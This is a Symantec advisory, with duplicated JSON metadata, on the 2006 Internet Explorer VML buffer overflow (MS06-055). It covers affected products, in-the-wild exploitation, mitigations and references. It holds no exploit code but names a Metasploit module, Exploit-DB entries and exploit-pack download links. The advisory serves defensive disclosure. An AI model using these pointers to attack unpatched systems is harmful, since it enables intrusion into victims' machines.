Microsoft Internet Explorer Vector Markup Language Buffer Overflow Vulnerability
2006-09-19T00:00:00
ID SMNTC-20096 Type symantec Reporter Symantec Security Response Modified 2006-09-19T00:00:00
Description
Description
Microsoft Internet Explorer is prone to a buffer-overflow vulnerability that arises because of an error in the processing of Vector Markup Language documents. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. The method currently used to exploit this issue will typically terminate Internet Explorer. This vulnerability is currently being exploited in the wild as 'Trojan.Vimalov'. This vulnerability affects Internet Explorer version 6.0 on a fully patched system. Previous versions may also be affected. Update: Microsoft Outlook 2003 is also an attack vector for this issue, since it uses Internet Explorer to render HTML email. Reportedly, attacks are possible even when active scripting has been disabled for email viewing.
Technologies Affected
Avaya Modular Messaging (MAS) 3.0.0
Avaya Modular Messaging (MAS)
Avaya S8100 Media Servers
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R9
HP Storage Management Appliance 2.1
Microsoft Internet Explorer 5.0.1 SP4
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Outlook 2003
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP4
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Professional
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition SP2
Recommendations
Run all software as a nonprivileged user with minimal access rights.
Ensure that all non-administrative tasks, such as browsing the web and reading email, are performed as an unprivileged user with minimal access rights.
Do not follow links provided by unknown or untrusted sources.
Users should never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.
Set web browser security to disable the execution of script code or active content.
Disabling scripting and active content in the Internet Zone may limit exposure to this and other vulnerabilities.
Modify default configuration files to disable any unwanted behavior.
Configure email client applications to display email as plaintext only. This will limit the possibility of email-based attacks.
Microsoft has released advisory MS06-055 to address this issue. Please see the referenced advisory for details on obtaining and applying the appropriate updates. Note: A third-party, temporary fix is available from the Zeroday Emergency Response Team (ZERT). Symantec has not verified this fix; Microsoft does not support it. Please see the references for more information.
{"published": "2006-09-19T00:00:00", "id": "SMNTC-20096", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [{"differentElements": ["description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2016-09-04T11:41:31", "bulletin": {"published": "2006-09-19T00:00:00", "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=20096", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "reporter": "Symantec Security Response", "history": [], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a buffer-overflow vulnerability that arises because of an error in the processing of Vector Markup Language documents. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. The method currently used to exploit this issue will typically terminate Internet Explorer. This vulnerability is currently being exploited in the wild as 'Trojan.Vimalov'. This vulnerability affects Internet Explorer version 6.0 on a fully patched system. Previous versions may also be affected. Update: Microsoft Outlook 2003 is also an attack vector for this issue, since it uses Internet Explorer to render HTML email. Reportedly, attacks are possible even when active scripting has been disabled for email viewing. \n\n### Technologies Affected\n\n * Avaya Modular Messaging (MAS)\n * Avaya Modular Messaging (MAS) 3.0.0\n * Avaya S8100 Media Servers\n * Avaya S8100 Media Servers R10\n * Avaya S8100 Media Servers R11\n * Avaya S8100 Media Servers R12\n * Avaya S8100 Media Servers R6\n * Avaya S8100 Media Servers R7\n * Avaya S8100 Media Servers R8\n * Avaya S8100 Media Servers R9\n * HP Storage Management Appliance 2.1\n * Microsoft Internet Explorer 5.0.1 SP4\n * Microsoft Internet Explorer 6.0\n * Microsoft Internet Explorer 6.0 SP1\n * Microsoft Outlook 2003\n * Microsoft Windows 2000 Advanced Server\n * Microsoft Windows 2000 Advanced Server SP1\n * Microsoft Windows 2000 Advanced Server SP2\n * Microsoft Windows 2000 Advanced Server SP3\n * Microsoft Windows 2000 Advanced Server SP4\n * Microsoft Windows 2000 Datacenter Server\n * Microsoft Windows 2000 Datacenter Server SP1\n * Microsoft Windows 2000 Datacenter Server SP2\n * Microsoft Windows 2000 Datacenter Server SP3\n * Microsoft Windows 2000 Datacenter Server SP4\n * Microsoft Windows 2000 Professional\n * Microsoft Windows 2000 Professional SP1\n * Microsoft Windows 2000 Professional SP2\n * Microsoft Windows 2000 Professional SP3\n * Microsoft Windows 2000 Professional SP4\n * Microsoft Windows 2000 Server\n * Microsoft Windows 2000 Server SP1\n * Microsoft Windows 2000 Server SP2\n * Microsoft Windows 2000 Server SP3\n * Microsoft Windows 2000 Server SP4\n * Microsoft Windows Server 2003 Datacenter Edition\n * Microsoft Windows Server 2003 Datacenter Edition Itanium\n * Microsoft Windows Server 2003 Datacenter Edition Itanium SP1\n * Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1\n * Microsoft Windows Server 2003 Datacenter Edition SP1\n * Microsoft Windows Server 2003 Datacenter x64 Edition\n * Microsoft Windows Server 2003 Enterprise Edition\n * Microsoft Windows Server 2003 Enterprise Edition Itanium\n * Microsoft Windows Server 2003 Enterprise Edition Itanium SP1\n * Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1\n * Microsoft Windows Server 2003 Enterprise Edition SP1\n * Microsoft Windows Server 2003 Enterprise x64 Edition\n * Microsoft Windows Server 2003 Standard Edition\n * Microsoft Windows Server 2003 Standard Edition SP1\n * Microsoft Windows Server 2003 Standard x64 Edition\n * Microsoft Windows Server 2003 Web Edition\n * Microsoft Windows Server 2003 Web Edition SP1\n * Microsoft Windows XP\n * Microsoft Windows XP 64-bit Edition\n * Microsoft Windows XP 64-bit Edition SP1\n * Microsoft Windows XP 64-bit Edition Version 2003\n * Microsoft Windows XP 64-bit Edition Version 2003 SP1\n * Microsoft Windows XP Home\n * Microsoft Windows XP Home SP1\n * Microsoft Windows XP Home SP2\n * Microsoft Windows XP Media Center Edition\n * Microsoft Windows XP Media Center Edition SP1\n * Microsoft Windows XP Media Center Edition SP2\n * Microsoft Windows XP Professional\n * Microsoft Windows XP Professional SP1\n * Microsoft Windows XP Professional SP2\n * Microsoft Windows XP Professional x64 Edition\n * Microsoft Windows XP Tablet PC Edition\n * Microsoft Windows XP Tablet PC Edition SP1\n * Microsoft Windows XP Tablet PC Edition SP2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nEnsure that all non-administrative tasks, such as browsing the web and reading email, are performed as an unprivileged user with minimal access rights.\n\n#### Do not follow links provided by unknown or untrusted sources.\n\nUsers should never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n#### Set web browser security to disable the execution of script code or active content.\n\nDisabling scripting and active content in the Internet Zone may limit exposure to this and other vulnerabilities.\n\n#### Modify default configuration files to disable any unwanted behavior.\n\nConfigure email client applications to display email as plaintext only. This will limit the possibility of email-based attacks. \n\nMicrosoft has released advisory MS06-055 to address this issue. Please see the referenced advisory for details on obtaining and applying the appropriate updates. Note: A third-party, temporary fix is available from the Zeroday Emergency Response Team (ZERT). Symantec has not verified this fix; Microsoft does not support it. Please see the references for more information. \n", "bulletinFamily": "software", "viewCount": 0, "cvelist": ["CVE-2006-4668", "CVE-2006-4868"], "affectedSoftware": [{"version": "R8", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows Server 2003 Datacenter Edition Itanium", "operator": "eq"}, {"version": "SP3", "name": "Microsoft Windows 2000 Professional", "operator": "eq"}, {"version": "SP4", "name": "Microsoft Windows 2000 Advanced Server", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows XP Tablet PC Edition", "operator": "eq"}, {"version": "any", "name": "Microsoft Windows XP Professional", "operator": "eq"}, {"version": "3.0.0", "name": "Avaya Modular Messaging (MAS)", "operator": "eq"}, {"version": "R10", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "6.0", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "R11", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows Server 2003 Datacenter Edition", "operator": "eq"}, {"version": "SP3", "name": "Microsoft Windows 2000 Server", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows 2000 Datacenter Server", "operator": "eq"}, {"version": "SP4", "name": "Microsoft Windows 2000 Server", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows XP Media Center Edition", "operator": "eq"}, {"version": "2003", "name": "Microsoft Outlook", "operator": "eq"}, {"version": "SP4", "name": "Microsoft Windows 2000 Datacenter Server", "operator": "eq"}, {"version": "1", "name": "Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta", "operator": "eq"}, {"version": "any", "name": "Microsoft Windows XP Tablet PC Edition", "operator": "eq"}, {"version": "6.0 SP1", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows Server 2003 Web Edition", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows XP Media Center Edition", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows XP Home", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows 2000 Professional", "operator": "eq"}, {"version": "5.0.1 SP4", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows Server 2003 Standard Edition", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows XP Home", "operator": "eq"}, {"version": "R12", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "2.1", "name": "HP Storage Management Appliance", "operator": "eq"}, {"version": "R7", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "R6", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows 2000 Professional", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows XP Tablet PC Edition", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows 2000 Datacenter Server", "operator": "eq"}, {"version": "any", "name": "Microsoft Windows XP Home", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows XP Professional", "operator": "eq"}, {"version": "SP3", "name": "Microsoft Windows 2000 Datacenter Server", "operator": "eq"}, {"version": "any", "name": "Microsoft Windows XP Media Center Edition", "operator": "eq"}, {"version": "SP4", "name": "Microsoft Windows 2000 Professional", "operator": "eq"}, {"version": "(MAS)", "name": "Avaya Modular Messaging", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows Server 2003 Enterprise Edition Itanium", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows Server 2003 Enterprise Edition", "operator": "eq"}, {"version": "2003", "name": "Microsoft Windows XP 64-bit Edition Version", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows 2000 Server", "operator": "eq"}, {"version": "2003", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows XP 64-bit Edition", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows XP Professional", "operator": "eq"}, {"version": "SP2", "name": "Microsoft Windows 2000 Advanced Server", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows 2000 Server", "operator": "eq"}, {"version": "2003 SP1", "name": "Microsoft Windows XP 64-bit Edition Version", "operator": "eq"}, {"version": "any", "name": "Microsoft Windows XP", "operator": "eq"}, {"version": "1", "name": "Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta", "operator": "eq"}, {"version": "SP3", "name": "Microsoft Windows 2000 Advanced Server", "operator": "eq"}, {"version": "R9", "name": "Avaya S8100 Media Servers", "operator": "eq"}, {"version": "SP1", "name": "Microsoft Windows 2000 Advanced Server", "operator": "eq"}], "type": "symantec", "hash": "51498c7f99eb478f47d63a580eb0ff0e88be5303b16b75897f6b48adeea82d99", "references": ["http://sunbeltblog.blogspot.com/2006/09/javascript-no-longer-valid-mitigation.html", "http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-091914-1801-99&tabid=1", "http://isotf.org/zert/", "http://eeyeresearch.typepad.com/blog/2006/09/yet_another_int.html", "http://blogs.securiteam.com/index.php/archives/624", "http://msinfluentials.com/blogs/jesper/archive/2006/09/22/More-options-on-protecting-against-the-VML-vulnerability-on-a-domain.aspx", "http://isotf.org/zert/papers/vml-details-20060928.pdf", "http://www.eweek.com/article2/0,1895,2019162,00.asp", "http://www.kb.cert.org/vuls/id/416092", "http://www.websense.com/securitylabs/blog/blog.php?BlogID=80", "http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack.pdf", "https://www.immunityinc.com/downloads/immpartners/SALVO_01.tar.gz", "https://www.immunityinc.com/downloads/immpartners/SALVO.tar.gz", "http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx", "http://zert.isotf.org/papers/vml-details-20060928.pdf", "http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html", "http://www.microsoft.com/windows/ie/", "http://news.portalit.net/fullnews_The-VML-Flaw-Harms-Outlook-2003-As-Well_2054.html", "http://sf-freedom.blogspot.com/", "http://www.microsoft.com/technet/security/advisory/925568.mspx", "http://blogs.securiteam.com/?p=640"], "enchantments": {"score": {"value": 7.6, "modified": "2016-09-04T11:41:31"}}, "title": "Microsoft Internet Explorer Vector Markup Language Buffer Overflow Vulnerability", "id": "SMNTC-20096", "lastseen": "2016-09-04T11:41:31", "edition": 1, "objectVersion": "1.2", "hashmap": [{"hash": "8cca1364120fe313b63d2f8877b5a093", "key": "references"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "0ef402baca9df3aceb5c351585aaa46e", "key": "modified"}, {"hash": "e05582c14eb110be6b72d6c5e20bb9c7", "key": "href"}, {"hash": "6412fad4d1ad9bd9b523963845994c89", "key": "title"}, {"hash": "9a27b9bbae5d9751f8d4ba4a5139cb7d", "key": "description"}, {"hash": "0ef402baca9df3aceb5c351585aaa46e", "key": "published"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "ad966d45caf10084e084858d850a5d96", "key": "cvelist"}, {"hash": "0705fcfe634229b593b0e14a56494f69", "key": "affectedSoftware"}], "modified": "2006-09-19T00:00:00"}}], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a buffer-overflow vulnerability that arises because of an error in the processing of Vector Markup Language documents. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. The method currently used to exploit this issue will typically terminate Internet Explorer. This vulnerability is currently being exploited in the wild as 'Trojan.Vimalov'. This vulnerability affects Internet Explorer version 6.0 on a fully patched system. Previous versions may also be affected. Update: Microsoft Outlook 2003 is also an attack vector for this issue, since it uses Internet Explorer to render HTML email. Reportedly, attacks are possible even when active scripting has been disabled for email viewing.\n\n### Technologies Affected\n\n * Avaya Modular Messaging (MAS) 3.0.0 \n * Avaya Modular Messaging (MAS) \n * Avaya S8100 Media Servers \n * Avaya S8100 Media Servers R10 \n * Avaya S8100 Media Servers R11 \n * Avaya S8100 Media Servers R12 \n * Avaya S8100 Media Servers R6 \n * Avaya S8100 Media Servers R7 \n * Avaya S8100 Media Servers R8 \n * Avaya S8100 Media Servers R9 \n * HP Storage Management Appliance 2.1 \n * Microsoft Internet Explorer 5.0.1 SP4 \n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Outlook 2003 \n * Microsoft Windows 2000 Advanced Server \n * Microsoft Windows 2000 Advanced Server SP1 \n * Microsoft Windows 2000 Advanced Server SP2 \n * Microsoft Windows 2000 Advanced Server SP3 \n * Microsoft Windows 2000 Advanced Server SP4 \n * Microsoft Windows 2000 Datacenter Server \n * Microsoft Windows 2000 Datacenter Server SP1 \n * Microsoft Windows 2000 Datacenter Server SP2 \n * Microsoft Windows 2000 Datacenter Server SP3 \n * Microsoft Windows 2000 Datacenter Server SP4 \n * Microsoft Windows 2000 Professional \n * Microsoft Windows 2000 Professional SP1 \n * Microsoft Windows 2000 Professional SP2 \n * Microsoft Windows 2000 Professional SP3 \n * Microsoft Windows 2000 Professional SP4 \n * Microsoft Windows 2000 Server \n * Microsoft Windows 2000 Server SP1 \n * Microsoft Windows 2000 Server SP2 \n * Microsoft Windows 2000 Server SP3 \n * Microsoft Windows 2000 Server SP4 \n * Microsoft Windows Server 2003 Datacenter Edition \n * Microsoft Windows Server 2003 Datacenter Edition Itanium \n * Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 \n * Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1 \n * Microsoft Windows Server 2003 Datacenter Edition SP1 \n * Microsoft Windows Server 2003 Datacenter x64 Edition \n * Microsoft Windows Server 2003 Enterprise Edition \n * Microsoft Windows Server 2003 Enterprise Edition Itanium \n * Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 \n * Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1 \n * Microsoft Windows Server 2003 Enterprise Edition SP1 \n * Microsoft Windows Server 2003 Enterprise x64 Edition \n * Microsoft Windows Server 2003 Standard Edition \n * Microsoft Windows Server 2003 Standard Edition SP1 \n * Microsoft Windows Server 2003 Standard x64 Edition \n * Microsoft Windows Server 2003 Web Edition \n * Microsoft Windows Server 2003 Web Edition SP1 \n * Microsoft Windows XP 64-bit Edition \n * Microsoft Windows XP 64-bit Edition SP1 \n * Microsoft Windows XP 64-bit Edition Version 2003 \n * Microsoft Windows XP 64-bit Edition Version 2003 SP1 \n * Microsoft Windows XP \n * Microsoft Windows XP Home \n * Microsoft Windows XP Home SP1 \n * Microsoft Windows XP Home SP2 \n * Microsoft Windows XP Media Center Edition \n * Microsoft Windows XP Media Center Edition SP1 \n * Microsoft Windows XP Media Center Edition SP2 \n * Microsoft Windows XP Professional \n * Microsoft Windows XP Professional SP1 \n * Microsoft Windows XP Professional SP2 \n * Microsoft Windows XP Professional x64 Edition \n * Microsoft Windows XP Tablet PC Edition \n * Microsoft Windows XP Tablet PC Edition SP1 \n * Microsoft Windows XP Tablet PC Edition SP2 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nEnsure that all non-administrative tasks, such as browsing the web and reading email, are performed as an unprivileged user with minimal access rights.\n\n**Do not follow links provided by unknown or untrusted sources.** \nUsers should never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Set web browser security to disable the execution of script code or active content.** \nDisabling scripting and active content in the Internet Zone may limit exposure to this and other vulnerabilities.\n\n**Modify default configuration files to disable any unwanted behavior.** \nConfigure email client applications to display email as plaintext only. This will limit the possibility of email-based attacks.\n\nMicrosoft has released advisory MS06-055 to address this issue. Please see the referenced advisory for details on obtaining and applying the appropriate updates. Note: A third-party, temporary fix is available from the Zeroday Emergency Response Team (ZERT). Symantec has not verified this fix; Microsoft does not support it. Please see the references for more information.\n", "hash": "87388b43605f4f0c16cbcc85921355ee5d1023bdf230fa2aa74df4d5828cc289", "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-03-14T22:40:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4868", "CVE-2006-4668"]}, {"type": "saint", "idList": ["SAINT:9F72B0CFF58AD7A47199484386986BB7", "SAINT:6A37B01591A310C332C01DD4BCA3324B", "SAINT:580A16A959FD7F0F499A49F545FE25DC"]}, {"type": "cert", "idList": ["VU:416092"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83194"]}, {"type": "nessus", "idList": ["SMB_NT_MS06-055.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14434"]}, {"type": "canvas", "idList": ["MS06_055"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS06_055_VML_METHOD"]}, {"type": "exploitdb", "idList": ["EDB-ID:16597", "EDB-ID:28494", "EDB-ID:2425"]}, {"type": "osvdb", "idList": ["OSVDB:28611", "OSVDB:28946"]}], "modified": "2018-03-14T22:40:19"}, "vulnersScore": 7.3}, "type": "symantec", "lastseen": "2018-03-14T22:40:19", "edition": 2, "title": "Microsoft Internet Explorer Vector Markup Language Buffer Overflow Vulnerability", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/20096", "modified": "2006-09-19T00:00:00", "bulletinFamily": "software", "viewCount": 2, "cvelist": ["CVE-2006-4668", "CVE-2006-4868"], "affectedSoftware": [{"version": "6.0 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "2000 Datacenter Server ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Advanced Server ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Enterprise Edition Itanium SP1 Beta 1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 Standard x64 Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "5.0.1 SP4 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "2003 Datacenter Edition Itanium SP1 Beta 1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 Datacenter Edition Itanium SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 Datacenter Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Server SP1 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Datacenter Server SP3 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "64-bit Edition Version 2003 SP1 ", "name": "Microsoft Windows XP", "operator": "eq"}, {"version": "2000 Datacenter Server SP4 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Standard Edition SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Advanced Server SP2 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Datacenter x64 Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Server SP4 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Professional ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Server SP3 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Enterprise Edition Itanium SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Professional SP4 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Enterprise x64 Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Advanced Server SP4 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Enterprise Edition Itanium ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Datacenter Server SP1 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Server SP2 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Standard Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 Enterprise Edition SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2.1 ", "name": "HP Storage Management Appliance", "operator": "eq"}, {"version": "2000 Advanced Server SP3 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "64-bit Edition ", "name": "Microsoft Windows XP", "operator": "eq"}, {"version": "2000 Advanced Server SP1 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Professional SP2 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "64-bit Edition Version 2003 ", "name": "Microsoft Windows XP", "operator": "eq"}, {"version": "2000 Professional SP1 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Datacenter Server SP2 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2000 Professional SP3 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "6.0 SP1 ", "name": "Microsoft Internet Explorer", "operator": "eq"}, {"version": "2003 Datacenter Edition Itanium ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 Datacenter Edition SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 Web Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2000 Server ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Enterprise Edition ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 ", "name": "Microsoft Outlook", "operator": "eq"}, {"version": "64-bit Edition SP1 ", "name": "Microsoft Windows XP", "operator": "eq"}, {"version": "2003 Web Edition SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}], "references": ["http://sunbeltblog.blogspot.com/2006/09/javascript-no-longer-valid-mitigation.html", "http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-091914-1801-99&tabid=1", "http://isotf.org/zert/", "http://eeyeresearch.typepad.com/blog/2006/09/yet_another_int.html", "http://blogs.securiteam.com/index.php/archives/624", "http://msinfluentials.com/blogs/jesper/archive/2006/09/22/More-options-on-protecting-against-the-VML-vulnerability-on-a-domain.aspx", "http://isotf.org/zert/papers/vml-details-20060928.pdf", "http://www.eweek.com/article2/0,1895,2019162,00.asp", "http://www.kb.cert.org/vuls/id/416092", "http://www.websense.com/securitylabs/blog/blog.php?BlogID=80", "http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack.pdf", "https://www.immunityinc.com/downloads/immpartners/SALVO_01.tar.gz", "https://www.immunityinc.com/downloads/immpartners/SALVO.tar.gz", "http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx", "http://zert.isotf.org/papers/vml-details-20060928.pdf", "http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html", "http://www.microsoft.com/windows/ie/", "http://news.portalit.net/fullnews_The-VML-Flaw-Harms-Outlook-2003-As-Well_2054.html", "http://sf-freedom.blogspot.com/", "http://www.microsoft.com/technet/security/advisory/925568.mspx", "http://blogs.securiteam.com/?p=640"], "reporter": "Symantec Security Response", "hashmap": [{"hash": "47201b18240d5ce31f5aa105acfe62a4", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "ad966d45caf10084e084858d850a5d96", "key": "cvelist"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "707a32f44ff82bce89f292f8293ffdda", "key": "description"}, {"hash": "569e4e319e44b46e57aea9d3a187f1c4", "key": "href"}, {"hash": "0ef402baca9df3aceb5c351585aaa46e", "key": "modified"}, {"hash": "0ef402baca9df3aceb5c351585aaa46e", "key": "published"}, {"hash": "8cca1364120fe313b63d2f8877b5a093", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "6412fad4d1ad9bd9b523963845994c89", "key": "title"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}], "objectVersion": "1.3"}
